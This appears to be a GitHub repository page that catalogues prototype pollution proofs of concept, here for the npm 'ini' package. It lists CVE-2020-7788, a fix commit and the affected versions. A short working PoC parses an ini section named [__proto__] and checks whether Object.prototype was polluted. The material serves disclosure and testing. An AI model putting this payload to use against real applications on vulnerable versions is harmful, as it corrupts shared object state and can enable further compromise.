ini

Jul 22, 2021

aacebfd · Jul 22, 2021

Name	Name	Last commit message	Last commit date
parent directory ..
META.md	META.md	add CVEs and refs to fix commits	Jul 22, 2021
README.md	README.md	add CVEs and refs to fix commits	Jul 22, 2021
__proto__.js	__proto__.js	more exploits	Jul 7, 2021

README.md

An ini encoder/decoder for node

Latest version: 2.0.0

CVE	Fix
CVE-2020-7788	https://github.com/npm/ini/commit/56d2805e07ccd94e2ba0984ac9240ff02d44b6f1

const ini = require('ini');

ini.parse(`
[__proto__]
a = b
`);
if (({}).a === 'b') console.log('exploitable');

Vulnerable versions: 1.0.0 1.0.1 1.0.2 1.0.3 1.0.4 1.0.5 1.1.0 1.2.0 1.2.1 1.3.0 1.3.1 1.3.2 1.3.3 1.3.4 1.3.5